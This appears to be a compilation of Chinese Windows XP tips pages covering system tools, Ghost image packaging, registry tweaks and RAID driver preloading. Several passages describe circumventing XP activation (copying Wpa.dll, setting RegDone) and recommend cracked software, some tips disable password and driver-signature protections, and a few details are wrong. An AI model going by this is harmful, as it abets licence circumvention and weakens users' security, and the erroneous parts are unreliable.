    5、磁盘清理大师——Cleanmgr（system32文件夹下）

    尽管现在的硬盘越来越大，但它总有容量的限制。在你不经意地安装这个或那个软件的过程中，可能会因为硬盘空间已频频告急而影响了正常Windows程序的执行。

    不要急，请打开此程序，它会自动地释放出一部分硬盘空间，并会智能化地进行删除xx作，保证你的系统万无一失。这比从资源管理器中删除要安全多了。

    6、剪贴板查看器——Clipbrd（system32文件夹下）

    Windows剪贴板为我们在各个Windows程序间的信息交流提供了一个桥梁。但这部分数据一般情况下无法看到。不过，使用剪贴板查看器就可看到当前剪贴板中的“新大陆”。Windows XP中的剪贴板查看器程序较原先Windows 9X/Me的旧版本多出了共享功能，通过设置权限允许其他网上用户将该剪贴板装入使用。

    7、控制面板启动器——Control.exe（system32文件夹下）

    控制面板是Windows的一个重要组成部分，许多设置都通过他完成。而双击这个文件就是最快打开系统控制面板的方法，可省去从“开始”菜单上层层点击的麻烦。

    8、Windows XP的诊断医生——Drwtsn32（system32文件夹下）

    Drwtsn32是一个程序错误调试器。DrWatson程序会获得并记录运行Windows的计算机上的程序错误的信息。只要检测到错误，就会创建一个文本文件 (Drwtsn32.log)，提供错误原因的详细说明，并给出解决问题的建议性xx作，在与Microsoft技术支持联系并请求帮助时，Drwatson将会起到很大作用。

    9、DVD播放器——DVDplay（system32文件夹下）

    随着DVD驱动器和DVD光盘价格的下降，在普通家庭电脑上配置一个DVD播放器已不是一件奢侈的事情。而要播放DVD需要播放器的支持，Windows XP提供了一个“免费”的DVD播放器，有了它我们可以省去一笔购买第三方DVD播放软件的费用。
    10、自解压文件制作工具——Iexpress（system32文件夹下）

用过压缩软件的读者一定对自解压文件不陌生，自解压文件可在没有相应解压缩程序的情况下直接将压缩包文件解压缩到相应的文件夹下，极大地方便了用户。利用Iexpress可制作两种自解压文件，一种是标准自解压文件（Standard Self-Extractor），另一种是安装程序式自解压文件（Self-Extractor for Software Installation），这样我们在发布程序时就方便多了。

    另外大家要注意，尽管使用Iexpress的运行界面是英文的，但利用它生成的自解压文件却是中文的，省去了繁琐的本地化工作。

    11、文件转移向导——Migwiz（system32＼usmt文件夹下）

    Windows系统的易用性总是和不稳定性共存的，因此在系统健康之时把当前设置保存下来，供系统崩溃后重新安装时使用是个不错的主意。微软已把这个工具集成到“文件和设置转移向导”程序上。通过它，我们就可以实现系统状态的备份与恢复。

    12、系统配置程序——Msconfig（Windows＼PChealth＼HELPCTR＼Binaries文件夹下）

    和Windows中的系统配置程序一样，通过这个程序，我们可对系统的一般、SYSTEM.ini、WIN.ini、BOOT.ini、服务和启动项目进行修改。

    小提示：用它来去除系统自启动程序特别有效。

    13、备份工具——Ntbackup（system32文件夹下）

    数据是计算机中最为宝贵的资料，因此经常备份你的资料也应该成为一个好习惯。现在许多人都寻求第三方的备份工具，其实大可不必。使用Windows XP中内置的备份工具就可以非常方便地将资料进行备份，而且由于你使用的是微软产品，所以根本不存在兼容性问题。

    14、ODBC数据源管理器——Odbcad32（system32文件夹下）

    在Windows中访问ODBC数据源必须要有其驱动程序，该工具可以查看在Windows中已安装的驱动程序及相关信息。

    15、IP地址侦测器——Nslookup（system32文件夹下）

    在联入互联网的每台电脑都有一个IP地址，同样，每个网站也有它的IP地址，而且是唯一的。通过这个IP侦测工具ping就可以轻而易举地得到它们的真正IP地址。如笔者要想知道http://www.xxx.com的IP地址，...S窗口下输入ping http://www.xxx.com即可看到。

    16、屏幕键盘——Osk（system32文件夹下）

    屏幕键盘是一种实用工具，它在屏幕上显示虚拟键盘，允许那些有移动障碍的用户用指针设备或游戏杆输入数据。屏幕键盘旨在为存在移动障碍的用户提供最低级别的功能。这对于不知道如何键入的用户也很有用。它还可以用于最基本的CAI键盘教学。

    17、对象包装程序——Packager（system32文件夹下）

    通过对象包装程序我们可以打开一个文件，并引入其中的图标，将它们插入到一般Windows程序中使用，可用于制作计算机类教学课件或文档。

    18、注册表编辑器增强版——Regedit32（system32文件夹下）

    注册表编辑器是用来更改系统注册表设置的高级工具。注册表中包含了有关计算机如何运行的信息。在Windows XP中有一个名为Regedit的程序，可编辑注册表，但此程序却是它的增强版本，除可编辑注册表外，还可设置权限、清除重复项、删除已被卸载或删除的程序项等高级xx作。

    19、ActiveX注册和反注册工具——Regsvr32

    使用过ActiveX的人都知道，ActiveX不注册是不能够被系统识别和使用的，一般安装程序都会自动地把它所使用的ActiveX控件注册，但如果你拿到的一个控件需要手动注册怎么办呢？

    如果修改注册表那就太麻烦了，在Windows的System文件夹下有一个regsvr32.exe的程序，它就是Windows自带的ActiveX注册和反注册工具。它的用法为：

    “regsvr32 [/s] [/n] [/i(:cmdline)] dllname”。其中dllname为ActiveX控件文件名，建议在安装前拷贝到System文件夹下。

    数有如下意义：

    /u——反注册控件
    /s——不管注册成功与否，均不显示提示框

/c——控制台输出
    /i——跳过控件的选项进行安装（与注册不同）
    /n——不注册控件，此选项必须与/i选项一起使用

    如笔者要注册一amovie.ocx控件，则打入regsvr32 amovie.ocx即可，要反注册它时只需使用regsvr32 /u amovie.ocx就行了。

    20、动态链接库函数启动器——Rundll32

    在Windows中使用了许多动态链接库，这样就使得所有Windows程序都可共享这些动态链接库中的函数。一般情况下，许多应用程序都通过Windows API来xx作这些函数，但归根结底是通过Windows文件夹下的rundll32.exe程序来启动相应的函数。

    它的用法是：“rundll32.exe 动态链接库名,函数名,参数名”。如笔者需要实现一键关机，则在桌面上建立一快捷方式，命令行为“rundll32.exe user.exe,ExitWindows”，并设置其快捷键为F4即可。

    再如，笔者要打开控制面板，则只需要输入命令“rundll32.exe shell32.dll,Control_RunDLL”即可，要打开桌面属性，只需要使用“rundll32.exe shell32.dll,Control_RunDLL desk.cpl”，其余的以此类推。

    21、系统文件检查器——Sfc（system32文件夹下）

    使用Windows难免不会出现系统文件损坏或丢失的毛病，而如果为了几个小小的文件就去重装系统，又显得稍微麻烦了一些。通过系统文件检查器Sfc.exe，一切都会变得非常简单。

    22、共享文件夹设置工具——Shrpubw（system32文件夹下）

    同一工作组的同事在一起工作，有时必须与同事们共享文件夹，这时我们可以利用此工具轻松搞定。它的作用与右击一文件夹，选择“共享”基本上等价。

    23、Microsoft 签字验证工具——Sigverif（system32文件夹下）

    所谓“签署的文件”，就是被授予Microsoft数字签署的文件。该签署表明，该文件是原始文件的一模一样的副本。通过Microsoft签字验证工具，我们可在计算机上查找已签署和未签署的文件，也可查看签署文件的身份验证，以确认该文件还没有被篡改。

    使用起来非常方便，和查找窗口几乎没有什么不同，只要给出搜索范围，就可搜索出指定范围内的已签署文件和未签署文件。

    24、音量控制程序——Sndvol32

    我们在Windows任务栏上可见到一个可爱的小喇叭，当我们双击它时就会弹出音量控制面板，其实这时我们就是启动了一个Windows文件夹下的sndvol32.exe文件。不信，请你进入Windows文件夹，再打开sndvol32.exe文件看看，熟悉的“音量控制”面板是否已经在你眼前了？

    另外还要告诉大家，它还有一个隐藏的参数“/r”，利用此参数可快速地打开录音控制面板，这样我们只要在桌面上建立一指向C:＼Windows＼Sndvol32.exe的快捷方式，并令它的参数为/R（即在目标中填入“C:＼Windows＼Sndvol32.exe /R”），就可以快速打开录音控制面板选择输入设备了。

    如果设备过多，在面板上容纳不下时，试着按“Ctrl+S”键，不管有多少设备都能够完全显示。

    25、任务管理器——Taskmgr（system32文件夹下）

    任务管理器提供正在你的计算机上运行的程序和进程的相关信息，使用任务管理器可快速查看正在运行的程序的状态，或终止已停止响应的程序。也可使用多达15个的参数评估正在运行的进程的活动，以及查看CPU和内存使用情况的图形和数据。当计算机发生锁死时使用它最方便和有效。

    26、远程连接程序——Telnet（system32文件夹下）

    在Internet上有无数的计算机，而要访问它们都必须通过建立远程连接才行，进行两个计算机的远程连接可用专门软件实现，但通过Windows自带的远程连接程序telnet.exe也能完成这一xx作，而且它还是纯中文界面软件。

    27、远程FTP工具——Tftp（system32文件夹下）

    FTP是一个网络传输的协议，通过这个程序可非常方便地连接到对方的服务器上进行文件的存取xx作，省得再找如第三方的FTP软件了，可惜的是它是字符界面。

28、Windows升级程序——Wupdmgr（system32文件夹下）

    安装完Windows后，在开始菜单的上方会有Windows Update菜单项，通过它能自动登录到Microsoft公司的网站上完成自己Windows的升级工作。但时间一长，可能会把这个快捷方式误删除了，这时我们就可以通过打开Windows下的Wupdmgr.exe文件来完成这个功能。

    Windows XP实为一个功能强大的操作系统，但只有充分地发挥其内置功能，才能更好地使用它。这也符合“基础的未必是最坏的，回到基础还是好的”的道理。


www.163164.com WINXP终极瘦身、优化、封装全攻略 QQ 3149886

双击滚屏 单击停止

WINXP终极瘦身、优化、封装全攻略

万能WinXP Ghost镜像制作指南

重装系统可不是一件好玩的事情：首先得端坐在电脑桌前老老实实地回答windows安装程序提出的问题，安装好了呢，也不能闲着，还得安装驱动程序、应用程序……粗略佑计，没有半天拿不下来！可能有朋友会说，用Ghost，既快又方便，不出五分钟，系统就恢复了，不过那只是本机备份，如果拿到别人的机器上去恢复，肯定会“水土不服”，道理很简单：硬件、系统、网络的配置不可能都千篇一律……不过看完本文以后，你就可以轻松打造出一把万能钥匙了，随便什么机器，都可以轻松采用Ghost恢复安装的方法，10多分钟就能搞Windows XP的安装！

    一、做好准备工作

    安装好Windows XP并且利用Windows Update升级最新的系统补丁（包括service Pack l和其他最新的Hot fix），为了减少体积，NET Framework可以不安装，这样可以节省20多m的空间。安装DirectX9.0b、wmp9.0、ms java、GB18030支持等，最好重新启动一下系统。同时安装好所需的应用程序，不过不要贪多，因为将应用程序安装在 C 盘里并不是值得推荐的做法，同时会造成Ghost映像文件的容量过大。如果你为了携带方便想要把GHOST文件刻录在一张标准的700MCD-R上，那就需要你把C盘文件控制在1.3GB左右。不论你装多少软件，但必须是小于1.3GB。如果你有移动硬盘的话..................

    二、安装常用软件

    安装常用应用软件（裸版可以直接跳过这一步）,个人推荐以下软件:
    QQ2004艺风去广告显IP版。
    Winamp5.X汉化版或foobar
    MSN MESSENGER 去广告多用户补丁
    WINRAR3.X最新汉化注册版
    Flashget国际注册版
    Flashfxp注册版
    媒体播放器经典版最新版本或realone plus版
    MYIE2或其他外壳浏览器
    常用输入法但不要太大空间有限啊
    可升级的杀毒软件
    比特精灵2.5版
    注：不宜安装Daemon tools，新的方法封装后会不能使用，因为它作为一个驱动会被删除。所以有驱动（硬件）性质的也不能安装。
    另外还要对这些软件做些适当的调整，如flashget、bt等默认下载地址改为d:\download之类的，有时间最好运行一下，检查注册是否完成、并将注册方法放到安装目录，封装后可能变成未注册的就可以用上

    三、为Windows XP减肥

    不管是否需要将最后产生的Ghost映像文件刻录到光盘上，都应该对Windows XP进行减肥，以尽可能地减小Ghost映像文件的容量。可以删减的主要项目如下：

    1．系统文件保护缓存

    它位于C:\WINDOWS\System32\Dllcache目录下，我们只需在命令提示符窗口中运行“sfe . exe/purgecache”即可将它删除。

    2．清空页面文件

    转移分页文件（虚拟内存），可移到d盘或禁用，反正封装后又会恢复。Ghost8.0会直接屏蔽这个大块头。

    3．关闭系统还原功能

    在打开的“系统属性”对话框中选择“系统还原”选项卡，选中“在所有驱动器上关闭系统还原”前的复选框即可。

    4．禁用休眠，可以节省和内存一样大的空间。

    5. 转移IE的临时文件夹（缓存），也放到d:\temp;OE的存储位置改为D:\My Documents\oe；

    6. 转移我的文档的位置，推荐D:\My Documents

    7. 可选卸载不需要的windows组x

当前版本：2006-11-28 www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！ 收藏本站


XP重装需要激活的问题

《一键清理系统垃圾》

XP重装需要激活的问题

由于简体中文版的Windows XP采取了激活的反盗版技术，一般重新安装Windows XP必须重新激活。其实，我们在第一次激活后，只要先备份好Windows下面的System32子目录中的Wpa.dll文件。以后重新安装Windows XP后，只需要复制该文件到Windows下System32子目录中即可激活。如果你不放心，也可以单击“开始”→“运行”，输入如下命令：oobe/msoobe /a来检测你的XP是否已经激活。


XP的常用操作及技巧！

《一键清理系统垃圾》

XP的常用操作及技巧！

2002-02-23　　　　作者：

<清除 WinXP Shared Folders--就是在“我的计算机“里那些碍眼的分享数据夹>
--请从registry删掉以下code--

HKEY_LOCAL_MACHINE ＼ SOFTWARE ＼ Microsoft ＼ Windows ＼ CurrentVersion ＼ Explorer ＼

My Computer ＼ NameSpace ＼ DelegateFolders ＼ {59031a47-3f72-44a7-89c5-5595fe6b30ee}

***加速XP的开关机 ***
缩短等待时间
开启注册表编辑器，找到 HKEY_LOCAL_MACHINE＼System＼CurrentControlSet＼Control，
将 WaitToKillServiceTimeout 设为：1000或更小。

找到 HKEY_CURRENT_USER＼Control Panel＼Desktop 键，将右边窗口的 WaitToKillAppTimeout 改为 1000，
即关闭程序时仅等待1秒。将 HungAppTimeout 值改为：200，表示程序出错时等待0.5秒。

让系统自动关闭停止响应的程序。打开注册表 HKEY_CURRENT_USER＼Control Panel＼Desktop 键，
将 AutoEndTasks 值设为 1。

加快选单显示速度
开启注册表编辑器，找到 HKEY_CURRENT_USER＼Control Panel＼Desktop，
将其下的 MenuShowDelay 项改为：0，你的选单将会出乎意料地快。

以上调整项目我亲自试过.真的变快很有效! ^^...

B.***XP减肥方法 ***
1. 删除系统文件备份
sfc.exe /purgecache
2 删除驱动备份
windows＼driver cache＼i386目录下的Driver.cab文件 （73mb)
3. 取消系统还原
4、删除Help档（减掉40多mb)
5、删掉＼WINDOWS＼system32＼dllcache下档（减去200——300mb),这是备用的dll檔，
只要你已拷贝了安装文件，完全可以这样做。
6、把我的文件、IE的临时文件夹都转到其它硬盘（分区）。
7、把虚拟内存也转到其它硬盘。
8、将应用软件装在其它硬盘（这对重装系统也有好处）。
9、删除＼windows＼ime下不用的输入法！ （日文，韩文，简体中文输入法，84.5MB）
10、如用ntfs装xp,本身就节省硬盘。

开完机后可以试试在 执行列上打...
oobe/msoobe /a
如果出现...
Windows 产品启用
Windows 已经启用。请按[确定]结束。

XP版本
找寻计算机中windows/system32/NTOSKRNL.EXE 的这个档-->按右键-->选内容

辨认真假中文版XP的方法
1.执行超级终端机.是否为中文接口及中文名称抬头
2.寻找dxdiag.exe并执行.看看directx诊断程序中的系统信息
-->看看系统信息中的操作系统版本是否为5.1build2600
-->看看系统信息中的语言及区域设定是否都为中文
(如果是就没问题啰)

XP要做开机磁盘
在A槽-->按右键-->选格式化-->选建立一个MS-DOS开机磁盘

WinXP的ADSL拨接功能
方法:控制台-->网络联机-->建立一个新联机-->联机到因特网
-->手动设定我的联机-->使用需要使用者名称和密码的宽频联机来联机
-->ISP名称(随便填你想要的,如Hinet...)-->使用者名称.密码就填拨接账号与密码
-->下面3选项看需要可选可不选(其实XP内建的防火墙功能不错)-->完成
P.S 如要开机就自动拨接上网的话,把联机ICON抓到启动中,应该就可以啰

XP的网络芳邻(先假设网络都没问题)
控制台-->使用者账户-->建立新的账户
-->输入那台计算机的开机账号(计算机名称)及密码
-->选择“受限制的账户“-->完成
这样别人就可以登陆你的计算机里啰

XP里怎么开DMA
关于DMA:
到装置管理员里选择IDE ATA/ATAPI controllers
到Primary/Secondary IDE Channel里面的进阶设定
将所有的转送模式都设定为使用DMA(如果可用的话)
系统就会自动打开DMA支持(在BIOS里也应该要先设为支持DMA)

XP里关闭光盘Autorun功能
1.打开光驱的内容,将自动拨放里所有的光盘格式都设为不要有任何动作
OR
2.利用Group Policy (执行gpedit.msc)
到计算机设定-->系统管理模板-->系统
找到-->关闭自动拨放
按右键选-->内容,选择已-->启用,
在下面那里选-->所有的磁盘驱动器,
然后套用,重新开机,应该也可以,但是这个方法不能关闭音乐CD的自动拨放

XP的自动关机问题
如果不能自动关机的话
控制台-->电源-->显示-->屏幕保护程序-->电源管理-->APM打勾
这样应该就可以了
如果还不行,应该是BIOS的问题

XP关闭系统休眠功能
因为休眠功能占的硬盘空间蛮大的,
所以关闭比较好,
控制台-->电源选项-->休眠(不要打勾)

窗关错误回报
控制台---->系统---->进阶---->右下角--->错误报告---->关闭

XP安装驱动程序往往因为数字签署ㄉ关系挂不上去----->
把数字签署忽略掉===>
控制台----->系统------>硬件----->装置管理员----->驱动程序签署---->略过

使用Winxp的网友请务必检查一下
开始-->>执行-->>regedit
HKEY_LOCAL_MACHINE＼SOFTWARE＼Microsoft＼Windows NT＼CurrentVersion]
将 “RegDone“ = 的数值，由 “0“ 改成 “1“
如此才算完全“破解“ ,这个动作很重要
很多奇怪的小毛病因此而解决
请大家务必检查一下...........

WinXP执行时候为什么都会停顿一下呢?
开始~联机~显示所有联机
按~局域网络~右键~选内容
在一般下面~选Internet Protocol(TCP/IP)~按内容
使用下列的ip地址~第一个192.168.0.1~第二个打255.255.255.0
这样就好了~以后开机就不会停顿了


XP的故障恢复控制台

《一键清理系统垃圾》

XP的故障恢复控制台

    故障恢复控制台是Windows 2000/XP/2003中专用于修复系统的工具，它可以启用和禁用服务、格式化驱动器、在本地驱动器上读写数据（包括被格式化为 NTFS 文件系统的驱动器），并执行许多其他管理任务，是我们连Windows 2000/XP/2003安全模式都无法进入时修复系统的“法宝”。
    1． 使用故障恢复控制台

    计算机启动时选择“Microsoft Windows Recovery Console”（即故障恢复控制台）后，当系统给出提示时，输入管理员（Administrator）密码。然后在系统提示符下，键入“Recovery Console”命令。输入“help”可得到一列命令名称，输入“help 命令名称”可得到指定命令的帮助。

    在故障控制台中，我们可以使用Attrib、Batch、Bootcfg、ChDir (CD)、Chkdsk、Cls、Copy、Delete (Del)、Dir、Disable、Format、Diskpart、Enable、Expand 、Fixmbr、 Fixboot 等命令，对计算机出现的各种问题进行修复。

    2． 实用命令介绍

    显然，故障恢复控制台中的很多命令是我们已经很熟悉的，在此不再赘述。下面为大家介绍一般用户平时不常使用的命令，利用它们，我们可以轻松地完成许多系统维护工作。本期的“老树新花说DOS③”，介绍了可以在故障恢复控制台中使用的Expand、Rmdir命令。

    ①Diskpart

    作用：创建和删除硬盘驱动器上的分区。

    语法：Diskpart [/add 　 /delete] [device_name 　 drive_name 　 partition_name] [size]

    参数：如果不带任何参数，将启动 Diskpart 的 Windows 字符模式版本。

    /add——创建新的分区；

    /delete——删除现有分区；

    drive_name——以驱动器号表示的待删除分区，仅与“/delete”同时使用，如“E:”；

    partition_name——以分区名称表示的待删除分区，可代替“drive_name”，使用（仅与“/delete”同时使用）；

    size——要创建的分区大小，以兆字节(MB)表示，仅与“/add ”同时使用。

    实例：

    删除F分区——diskpart /delete F:

    创建一个200MB 的分区——diskpart /add DeviceHardDisk0 200

    ②Fixboot

    作用：将新的分区引导扇区写到指定分区。

    语法：Fixboot [drive]

    参数：如果不带任何参数，Fixboot 命令将向用户登录的系统分区写入新的分区引导扇区。 如果系统检测到无效或非标准分区表标记，将提示用户是否继续执行该命令，除非你访问的驱动器有问题，否则不要继续进行。向系统分区写入新的主引导记录可能破坏分区表并导致分区无法访问。

    实例：向驱动器D的系统分区写入新的分区引导扇区——Fixboot D：

    3． 删除故障恢复控制台

    虽然故障恢复控制台很好用，但如果你不喜欢它了，可以手工将它删除。方法是：

    打开“我的电脑”，双击安装了故障恢复控制台的硬盘驱动器，假设为C盘。单击“工具→文件夹选项”，选择“查看”选项卡，选中“显示所有文件和文件夹”选项前的复选框，清空“隐藏受保护的操作系统文件”选项前的复选框，“确定”后退出。

    现在进入C盘根目录，删除“Cmdcons”文件夹、Cmldr 文件。右键单击 Boot.ini 文件，选择“属性”，在打开的窗口中清除“只读”复选框，“确定”退出。再用“记事本”中打开 Boot.ini 文件，删除故障恢复控制台的条目（一般是“C:cmdconsbootsect.dat="Microsoft Windows Recovery Console"/cmdcons”），保存文件后关闭，最后再恢复Boot.ini文件的只读属性即可。


XP如何自动登录

《一键清理系统垃圾》

XP如何自动登录

WINDOWS XP必须全部满足以下条件，系统才能进行自动登录。

    第一、 只能设置一个用户，客户帐户打开与否不受影响。运行“控制面板”｜“用户帐户”此时出现“用户帐户”对话框，选中其它用户并双击图标对其进行一一删除，只保留一个想要登录的用户。

    第二、 不要设置任何密码。在“用户帐户”对话框中双击图标，进行删除密码操作。

    第三、 必须使用Windows XP的登录画面，不能用传统的登录画面。在“用户帐户”对话框中选“更改用户登录或注销的方式”并进入，此时出现“用户帐户”小对话框，单击“取消”然后在“使用欢迎屏幕”复选框中打勾。

    此三项不可缺少，否则系统就不会自动登录。


XP万能克隆全攻略

《一键清理系统垃圾》

XP万能克隆全攻略

Windows2000、XP、2003系统万能Ghost全攻略
一。Windows XP 系统激活：
二。XP系统的安装优化
三.删除XP系统原有驱动，可以进行克隆！
四.创建自动应答文件，系统重新封装！
五.常见问题及适用范围.

网页浏览地址
http://www.hu.zj.cninfo.net/~silkway/cai/WinXPghost/XPghost.htm
或者下载地址
http://www.hu.zj.cninfo.net/~sil ... host/WinXPghost.chm

小熊论坛还有一个

http://www2.beareyes.com.cn/bbs/5/110.htm

在2000年的时候，我胡乱写了一些东东，看看有没有需要的地方！！
可能都比较古老了！！呵呵，请别见笑。

《硬盘低格全攻略》
http://www.hu.zj.cninfo.net/~silkway/cai/lformat/lfmt1.htm
《硬盘分区全攻略》
http://www.hu.zj.cninfo.net/~silkway/cai/fdisk/fdisk1.htm
《单机架站全攻略》
http://www.hu.zj.cninfo.net/~silkway/cai/allserver/woyao.htm
《无盘2000终端全攻略》
http://www.hu.zj.cninfo.net/~silkway/cai/nodisk/nodisk.htm

《创建企业邮局全攻略》

http://www.hu.zj.cninfo.net/~silkway/cai/allserver/mailserver.htm
《XP远程桌面全攻略》
http://www.hu.zj.cninfo.net/~silkway/cai/desktop/desklink.htm
还有一些胡乱写拿不出手，怕被见笑。呵呵

下面以安装Promise Fasttrak TX2 IDE RAID卡举例说明：

支持SATA,SCSI,RAID控制器的ghostXP方法思路就是先给系统装上可能会用到的驱动程序，以后在启动的时候就不会出现蓝屏错误了。

一、需要用到的工具
devcon.exe（原ACPI法万用ghostXP中）

二、准备安装的驱动程序（XP版）
FASTTRAK.INF
FASTTRAK.CAT
FASTTRAK.SYS

三、将上述几个文件全部复制到一个目录下。在FASTTRAK.INF中我们可以看到以下部分内容：

[Promise]
%PCI\VEN_105A&DEV_4d33.DeviceDesc% = FasttrakPCI33 , PCI\VEN_105A&DEV_4d33
%PCI\VEN_105A&DEV_4D38&SUBSYS_4D39105A.DeviceDesc% = FasttrakPCI66 , PCI\VEN_105A&DEV_4D38&SUBSYS_4D39105A
%PCI\VEN_105A&DEV_4D30&SUBSYS_4D39105A.DeviceDesc% = FasttrakPCI100 , PCI\VEN_105A&DEV_4D30&SUBSYS_4D39105A
%PCI\VEN_105A&DEV_4D30&SUBSYS_4D39105A.DeviceDesc% = FasttrakPCI100 , PCI\VEN_105A&DEV_4D30&SUBSYS_4D32105A
%PCI\VEN_105A&DEV_6268.DeviceDesc% = FasttrakPCI_TX2 , PCI\VEN_105A&DEV_6268
%PCI\VEN_105A&DEV_6269.DeviceDesc% = FasttrakPCI_TX2000 , PCI\VEN_105A&DEV_6269

以上每行的最后一段就是所谓的hardware_id，即
PCI\VEN_105A&DEV_4d33
PCI\VEN_105A&DEV_4D38&SUBSYS_4D39105A
PCI\VEN_105A&DEV_4D30&SUBSYS_4D39105A
PCI\VEN_105A&DEV_4D30&SUBSYS_4D32105A
PCI\VEN_105A&DEV_6268
PCI\VEN_105A&DEV_6269

四、到dos窗口下进行硬件安装：
输入：devcon install <inf_file> <hardware_id>
对应本例为：
devcon install FASTTRAK.INF "PCI\VEN_105A&DEV_4d33"
（注：只需执行一行就行了，下面几行可以省略）
devcon install FASTTRAK.INF "PCI\VEN_105A&DEV_4D38&SUBSYS_4D39105A"
devcon install FASTTRAK.INF "PCI\VEN_105A&DEV_4D30&SUBSYS_4D39105A"
devcon install FASTTRAK.INF "PCI\VEN_105A&DEV_4D30&SUBSYS_4D32105A"
devcon install FASTTRAK.INF "PCI\VEN_105A&DEV_6268"
devcon install FASTTRAK.INF "PCI\VEN_105A&DEV_6269"

安装过程可能会出现“没有通过 Windows 徽标测试”的提示，点击“仍然继续”按钮。安装成功后会出现“Drivers updated successfully.”提示。

五、打开“注册表编辑器”，点开“HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CriticalDeviceDatabase”项，找到刚才安装的hardware_id，显示应该为：“”

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CriticalDeviceDatabase\pci#ven_105a&dev_4d33
（注：只需查看到一行就行了，下面几行可以推断出来）
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CriticalDeviceDatabase\pci#ven_105a&dev_4d30&subsys_4d32105a
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CriticalDeviceDatabase\pci#ven_105a&dev_4d30&subsys_4d39105a
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CriticalDeviceDatabase\pci#ven_105a&dev_4d38&subsys_4d39105a
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CriticalDeviceDatabase\pci#ven_105a&dev_6268
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CriticalDeviceDatabase\pci#ven_105a&dev_6269

将第一行的注册表内容导出得到：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CriticalDeviceDatabase\pci#ven_105a&dev_4d33]
"Service"="fasttrak"
"ClassGUID"="{4D36E97B-E325-11CE-BFC1-08002BE10318}"

其它内容我们可以推断出：

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CriticalDeviceDatabase\pci#ven_105a&dev_4d30&subsys_4d32105a]
"Service"="fasttrak"
"ClassGUID"="{4D36E97B-E325-11CE-BFC1-08002BE10318}"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CriticalDeviceDatabase\pci#ven_105a&dev_4d30&subsys_4d39105a]
"Service"="fasttrak"
"ClassGUID"="{4D36E97B-E325-11CE-BFC1-08002BE10318}"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CriticalDeviceDatabase\#ven_105a&dev_4d38&subsys_4d39105a]
"Service"="fasttrak"
"ClassGUID"="{4D36E97B-E325-11CE-BFC1-08002BE10318}"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CriticalDeviceDatabase\pci#ven_105a&dev_6268]
"Service"="fasttrak"
"ClassGUID"="{4D36E97B-E325-11CE-BFC1-08002BE10318}"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CriticalDeviceDatabase\pci#ven_105a&dev_6269]
"Service"="fasttrak"
"ClassGUID"="{4D36E97B-E325-11CE-BFC1-08002BE10318}"

我们可以根据上面的："Service"="fasttrak"数据将注册表 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\fasttrak 内容导出，得到：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\fasttrak]
"Type"=dword:00000001
"Start"=dword:00000000
"ErrorControl"=dword:00000001
"Tag"=dword:00000022
"ImagePath"=hex(2):53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,44,00, 52,00,49,00,56,00,45,00,52,00,53,00,5c,00,66,00,61,00,73,00,74,00,74,00,72, 00,61,00,6b,00,2e,00,73,00,79,00,73,00,00,00
"Group"="SCSI Miniport"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\fasttrak\Parameters]

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\fasttrak\Parameters\PnpInterface]
"5"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\fasttrak\Security]
"Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02, 00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00, 00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00, 05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00, 20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00, 00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01, 00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00

如果出现“HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\fasttrak\Enum”数据，删除即可。

六、通过以上操作，我们几个注册表文件和并得到对于预装Promise Fasttrak TX2 IDE RAID卡所需最终注册表内容：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CriticalDeviceDatabase\pci#ven_105a&dev_4d33]
"Service"="fasttrak"
"ClassGUID"="{4D36E97B-E325-11CE-BFC1-08002BE10318}"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CriticalDeviceDatabase\pci#ven_105a&dev_4d30&subsys_4d32105a]
"Service"="fasttrak"
"ClassGUID"="{4D36E97B-E325-11CE-BFC1-08002BE10318}"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CriticalDeviceDatabase\pci#ven_105a&dev_4d30&subsys_4d39105a]
"Service"="fasttrak"
"ClassGUID"="{4D36E97B-E325-11CE-BFC1-08002BE10318}"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CriticalDeviceDatabase\#ven_105a&dev_4d38&subsys_4d39105a]
"Service"="fasttrak"
"ClassGUID"="{4D36E97B-E325-11CE-BFC1-08002BE10318}"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CriticalDeviceDatabase\pci#ven_105a&dev_6268]
"Service"="fasttrak"
"ClassGUID"="{4D36E97B-E325-11CE-BFC1-08002BE10318}"

